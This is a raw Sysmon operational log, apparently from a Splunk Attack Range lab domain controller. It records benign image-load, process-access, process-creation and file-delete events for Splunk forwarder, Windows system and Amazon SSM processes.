734700x800000000000000099988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid 734700x800000000000000099983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000099981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x800000000000000099977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x800000000000000099975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.879{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000099969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.849{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-128MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:45.146{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37ACCA6FF54F4BEF197F33FE27A7FAF4,SHA256=731E850FFA3078711D211ADD1FA777E35E0BFBD5FDA73F2A7623096F012FE5E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000100064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program 